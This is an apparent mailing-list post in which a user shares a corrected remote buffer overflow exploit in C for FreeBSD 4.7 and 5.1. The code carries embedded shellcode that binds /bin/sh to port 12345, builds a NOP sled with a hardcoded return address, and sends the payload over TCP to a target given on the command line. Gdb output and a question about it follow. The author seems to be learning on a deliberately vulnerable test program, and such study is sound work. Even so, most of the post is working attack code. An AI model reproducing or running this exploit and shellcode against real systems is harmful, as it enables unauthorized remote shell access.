[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Problem with sample buffer overflow exploit solved



Hi,

Thanks to all people who helped me. Finally I solved my problem:)

Here is my corrected version of exploit. It worked in FreeBSD 5.1 and FreeBSD 4.7
-------------------------------------------------------------------------------------------------------------------------------
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>

/*
  * FreeBSD shellcode - binds /bin/sh to a port 12345
  * Claes M. Nyberg 20020619
  * <cmn@xxxxxxxxxxx>, <md0claes@xxxxxxxxxxxxxxxxxx>
  */
char shellcode[]=                                         /* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";

#define RET 0xbfbffa48

int main(int argc, char *argv[]) {
        char buffer[1064];
        int s,t, i, size,offset;
        struct sockaddr_in remote;
        struct hostent *host;

        if(argc != 4) {
                printf("Usage: %s target-ip port offset\n", argv[0]);
                return -1;
        }
        offset = RET - atoi(argv[3]);

        // filling buffer with NOPs
        memset(buffer, 0x90, 1064);

        printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);

//copying shellcode into buffer, at offset 140,150,200 it works finally :):):):)
        memcpy(buffer+851-sizeof(shellcode) , shellcode, sizeof(shellcode)-1);

// Copying the return address multiple times at the end of the buffer...
        for(i=1010; i < 1060; i+=4) {
                * ((int *) &buffer[i]) = offset;
        }
        buffer[1063] = 0x0;

        //getting hostname
        host=gethostbyname(argv[1]);
        if (host==NULL)
        {
                fprintf(stderr, "Unknown Host %s\n",argv[1]);
                return -1;
        }

        // creating socket...
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0)
        {
                fprintf(stderr, "Error: Socket\n");
                return -1;
        }
        remote.sin_family = AF_INET;
        remote.sin_addr = *((struct in_addr *)host->h_addr);
        remote.sin_port = htons(atoi(argv[2]));

        // connecting with destination host
        if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
        {
                close(s);
                fprintf(stderr, "Error: connect\n");
                return -1;
        }
        //sending exploit string
        size = send(s, buffer, sizeof(buffer), 0);
        if (size==-1)
        {
                close(s);
                fprintf(stderr, "sending data failed\n");
                return -1;
        }
        // closing socket
        close(s);
}
-------------------------------------------------------------------------------------------------------------------------------
The problem was before I placed shellcode in wrong place and shellcode executed partly. I moved my shellcode in different place and moved return address also and it worked finally. Spawns shell
in port 12345.
So it is really important to know where to place shellcode and return address. Also return address
must point to one of the NOPs before shellcode.

One more question.

When exploit is sent, in another terminal where I run vulnerable program from gdb I see:
-------------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x080480c0 in ?? ()
-------------------------------------------------------------------------------------------------------------------------------
When I issue command x/200bx $esp-200 I see following:
-------------------------------------------------------------------------------------------------------------------------------
(gdb) x/200bx $esp-200
0xbfbffd34:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd3c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd44:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd4c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd54:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd5c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd64:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd6c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd74:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd7c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd84:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd8c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd94:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffd9c:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffda4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdac:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdb4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdbc:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdc4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdcc:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdd4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffddc:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffde4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdec:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfbffdf4:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
(gdb)

What does it mean? Is it mean that program exited cleanly? Or it says it executed shellcode correctly?
Can somebody explain me about it little bit?

thanks in advance,

Ganbold